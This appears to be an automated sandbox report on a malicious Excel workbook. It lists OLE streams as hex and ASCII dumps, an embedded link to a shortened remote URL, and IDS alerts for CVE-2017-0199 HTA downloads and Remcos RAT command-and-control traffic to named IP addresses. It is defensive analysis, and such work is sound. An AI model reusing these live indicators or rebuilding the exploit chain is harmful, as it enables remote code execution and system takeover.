                                                                                                                                                                                                                    Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A52B4/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A52B4/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A52B4/Package, File Type: Microsoft Excel 2007+, Stream Size: 50945
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A52B4/Package
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                    Stream Size:50945
                                                                                                                                                                                                                    Entropy:7.631071730257267
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A56E1/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A56E1/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A56E1/Package, File Type: Microsoft Excel 2007+, Stream Size: 31124
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A56E1/Package
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                    Stream Size:31124
                                                                                                                                                                                                                    Entropy:7.746149934092623
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A5E23/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A5E23/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:484
                                                                                                                                                                                                                    Entropy:3.922883556049869
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A5E23/\x5SummaryInformation, File Type: data, Stream Size: 19956
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:19956
                                                                                                                                                                                                                    Entropy:3.056974324659501
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A5E23/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:95624
                                                                                                                                                                                                                    Entropy:3.889652332882722
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A6130/\x1CompObj, File Type: data, Stream Size: 94
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:94
                                                                                                                                                                                                                    Entropy:4.345966460061678
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A6130/\x1Ole, File Type: data, Stream Size: 64
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:64
                                                                                                                                                                                                                    Entropy:2.935667186688699
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
                                                                                                                                                                                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/MBD002A6130/CONTENTS, File Type: PDF document, version 1.7, Stream Size: 21760
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/CONTENTS
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:PDF document, version 1.7
                                                                                                                                                                                                                    Stream Size:21760
                                                                                                                                                                                                                    Entropy:7.954015192696893
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
                                                                                                                                                                                                                    Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65
                                                                                                                                                                                                                    Stream Path: MBD001CA3FC/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 218908
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:218908
                                                                                                                                                                                                                    Entropy:7.606771386739727
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Stream Path: MBD001CA3FD/\x1Ole, File Type: data, Stream Size: 434
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FD/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:434
                                                                                                                                                                                                                    Entropy:4.980156456466635
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . } c ! . . . . . . . . . . . . . z . . . y . . . K . v . . . h . t . t . p . s . : . / . / . w . r . a . t . h . . . m . e . / . E . h . Y . y . k . L . . . . . ' < { a ; n . U F X U q 0 N p m L t K 8 . 5 . . l - 7 h > a T o . . . . . . . . . . . . . . . . . . . . W . G . 4 . q . a . m . x . y . 8 . g . R . P . B . f . b . r . R . R . m . g . 8 . Y . r . 7 . j . l . e . e . p . B . 0 . n . v . D . h . w . O . F . y . 3 . F . z . b . d . B . o . q . 9 . N . l . v . 7 . O . q . g . d . 7 . p . 6 . K
                                                                                                                                                                                                                    Data Raw:01 00 00 02 7d e8 63 21 92 88 94 05 00 00 00 00 00 00 00 00 00 00 00 00 7a 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 76 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 77 00 72 00 61 00 74 00 68 00 2e 00 6d 00 65 00 2f 00 45 00 68 00 59 00 79 00 6b 00 4c 00 00 00 e6 19 b2 a9 0e 27 ed e2 87 3c 7b f9 e8 61 3b b4 e9 6e d0 d4 a3 55 e0 46 d9 58 55 71 30 4e 9c 70
                                                                                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 339321
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:339321
                                                                                                                                                                                                                    Entropy:7.998763504504139
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . b Y G ( % 6 Y $ < . . . ] . L & . > 3 e W _ s * G . h . . . . . . . [ j . . . \\ . p . B o . . . N W / O s z . ' . C g L k . 8 e & X 6 T ) # . f R k p . j ) V 3 . b p ? ! . P 4 i . " l T . ) . ~ 4 . ( L \\ " . W B . . . a . . . \\ . . . = . . . . ] C T . . . . . . ~ K Y ] # . t . . . v . . . . . @ T . . . . . O . . . . Q . . . . . . . N = . . . e & 4 . . y . @ . . . 1 \\ . . . " . . . l H . . . . . . . . P . . . . 1 . . . ^ : . 1 ; c Q . i c R . 1 G # { 1 .
                                                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 62 59 8d 96 47 28 25 93 36 d5 ce 59 c4 24 3c 83 05 df f5 0d df 12 aa 5d a7 15 4c 26 d7 96 3e ae c3 d4 33 65 57 5f d7 73 2a 47 ef ed 12 ed 68 f3 e1 00 02 00 b0 04 c1 00 02 00 5b 6a e2 00 00 00 5c 00 70 00 89 42 84 6f 04 1b 17 4e 57 2f 4f 81 b5 d2 d2 73 a7 a6 7a ec 0d 82 27 ec 95 08 43 de 67 e3
                                                                                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 525
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Stream Size:525
                                                                                                                                                                                                                    Entropy:5.255382494742475
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:I D = " { 9 6 5 B B 2 6 7 - 0 A 9 7 - 4 2 3 0 - 8 7 6 F - 8 6 8 7 7 5 F B B 6 0 B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 8 6 A A B 2 9 A F 2 9 A F 2 9 A
                                                                                                                                                                                                                    Data Raw:49 44 3d 22 7b 39 36 35 42 42 32 36 37 2d 30 41 39 37 2d 34 32 33 30 2d 38 37 36 46 2d 38 36 38 37 37 35 46 42 42 36 30 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:104
                                                                                                                                                                                                                    Entropy:3.0488640812019017
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:2644
                                                                                                                                                                                                                    Entropy:3.9919548639670577
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:553
                                                                                                                                                                                                                    Entropy:6.357900004738902
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . ' . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                                                                                                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 02 27 17 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-10-08T15:23:40.699677+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162192.3.220.4080TCP
                                                                                                                                                                                                                    2024-10-08T15:23:40.699679+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.4080192.168.2.2249162TCP
                                                                                                                                                                                                                    2024-10-08T15:23:43.864625+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.220.4080TCP
                                                                                                                                                                                                                    2024-10-08T15:23:43.864669+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.4080192.168.2.2249164TCP
                                                                                                                                                                                                                    2024-10-08T15:24:00.186433+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.2249166TCP
                                                                                                                                                                                                                    2024-10-08T15:24:01.381632+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11192.3.220.4080192.168.2.2249171TCP
                                                                                                                                                                                                                    2024-10-08T15:24:01.381632+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11192.3.220.4080192.168.2.2249171TCP
                                                                                                                                                                                                                    2024-10-08T15:24:01.627421+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249172192.3.220.4080TCP
                                                                                                                                                                                                                    2024-10-08T15:24:02.926947+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249173135.148.195.2486875TCP
                                                                                                                                                                                                                    2024-10-08T15:24:03.976682+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249174135.148.195.2486875TCP
